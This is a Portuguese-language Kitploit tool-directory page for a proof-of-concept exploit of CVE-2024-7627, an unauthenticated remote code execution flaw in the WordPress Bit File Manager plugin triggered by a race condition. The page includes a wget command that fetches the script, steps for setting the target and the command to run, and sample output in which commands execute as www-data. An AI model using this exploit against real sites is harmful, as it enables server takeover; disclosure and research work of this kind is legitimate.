Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-7627-PoC — Script de Prova de Conceito para a vulnerabilidade de Execução Remota de Código Não Autenticada via Condição de Corrida no plugin Bit File Manager do WordPress, versão 6.0 - 6.5.5 (CVE-2024-7627) | Kitploit
Ferramentas/GitHubGitHub/siunam321/cve-2024-7627-poc
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubsiunam321/cve-2024-7627-poc

CVE-2024-7627-PoC

Script de Prova de Conceito para a vulnerabilidade de Execução Remota de Código Não Autenticada via Condição de Corrida no plugin Bit File Manager do WordPress, versão 6.0 - 6.5.5 (CVE-2024-7627)

Ver Repositório
621há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-7627-PoC

Contexto

Este script de Prova de Conceito (PoC) explora a vulnerabilidade de Execução Remota de Código não autenticada via Condição de Corrida (CVE-2024-7627) no plugin Bit File Manager versão 6.0 - 6.5.5 para WordPress.

Informações

Descrição:

O plugin Bit File Manager para WordPress está vulnerável a Execução Remota de Código nas versões 6.0 a 6.5.5 por meio da função 'checkSyntax'. Isso ocorre devido à gravação de um arquivo temporário em um diretório de acesso público antes de realizar a validação do arquivo. Isso possibilita que atacantes não autenticados executem código no servidor se um administrador tiver permitido permissões de leitura para Usuários Convidados. (Fonte: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition)

Detalhes Técnicos

Writeup: https://siunam321.github.io/ctf/Bug-Bounty/Wordfence/how-i-found-my-first-vulnerabilities-in-6-different-wordpress-plugins-part-2/#flawedmissing-permission-check---bit-file-manager-rce-via-race-condition

Instalação

root@kitploit:~
wget https://raw.githubusercontent.com/siunam321/CVE-2024-7627-PoC/main/poc.py

Uso/Exploração

  • Pré-requisito: o acesso de usuário convidado e o shortcode file-manager já devem ter sido configurados pelo administrador

Atualize, no script Python poc.py, os campos targetBaseUrl, fileManagerPostPath e/ou commandToExecute para os valores desejados. Em seguida, execute python3 poc.py para rodar o script PoC.

Exemplo de saída:

root@kitploit:~
└> python3 poc.py
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: f3128b289e
[*] Getting a random file's hash via elFinder command "open"...
[+] Found file "wp-config-sample.php" with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA"!
[*] Editing file with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA" via elFinder command "put" and getting the edited temporary PHP file at "http://localhost/wp-content/uploads/file-managertemp.php"...
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[+] We won the race condition! Here's the PHP payload result:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8d3b2776e8a6
Baixar ferramenta